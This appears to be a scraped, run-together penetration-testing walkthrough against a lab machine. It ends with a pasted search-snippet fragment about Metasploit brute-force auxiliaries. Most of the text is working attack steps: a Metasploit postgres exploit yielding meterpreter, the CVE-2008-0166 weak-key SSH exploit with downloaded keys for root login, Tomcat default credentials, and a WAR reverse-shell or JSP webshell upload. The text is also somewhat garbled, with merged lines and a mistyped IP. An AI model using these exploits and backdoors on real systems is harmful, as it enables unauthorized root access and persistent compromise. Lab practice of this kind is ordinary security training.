1 2 3msf use exploit/linux/postgres/postgrespayloadmsf exploit(postgrespayload) set rhost 192.168.79.179msf exploit(postgrespayload) exploitget meterpreter:SSH exploit (port 22):Getting access to a system with a writeable filesystemSince the nmap shows the openssh version is 4.7. I googled it and find it use Openssl 0.9.8gsearch openssl exploit:searchsploit opensslLooks like these exploits can be used. The vulnerability is CVE-2008-0166.I use 5720.py.First, download precalculated vulnerable keyswget ittar jxf 5622.tar.bz2run the command:python 5720.py rsa/2048/ 192.168.79.179 root 22 5rsa/2048 is the folder contains the keys.Found keys:login the box:ssh -l root -p22 -i rsa/2048//c551f0a5d2f76d88b58b3ae90ceb617a-22002 192.168.79.179TELNET exploitin msfconsole, search telnet. 1 2 3msf use auxiliary/scanner/x11/openx11msf auxiliary(openx11) set rhosts 192.168.79.179msf auxiliary(openx11) runshows. 192.168.79.179:6000 - 192.168.79.179 Access Deniednow, try to login use telnet username/password to X11ssh -X -l msfadmin 192.168.79.179 Exploit Apache Tomcat (port 8180)use Nikto to scannikto -h 182.168.79.179:8180defalut credential is found: ID ‘tomcat’, PW ‘tomcat’.nagviate to input username/password, and we are in:same shit, generate upload WAR reverse shell backdoor.create webshell called index.jsp (from pentester lab, you may generate it using msfvenom).
Sep 14, 2012 - PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.6p1. PRNG Bruteforce SSH Exploit (Python) /linux/remote/5720.py OpenSSL. The services are FTP, SSH, mysql, http, and Telnet. To perform a brute-force attack on these services, we will use auxiliaries of each service. Auxiliaries are small scripts used in Metasploit which don’t create a shell in the victim machine; they just provide access to the machine if the brute-force attack is successful.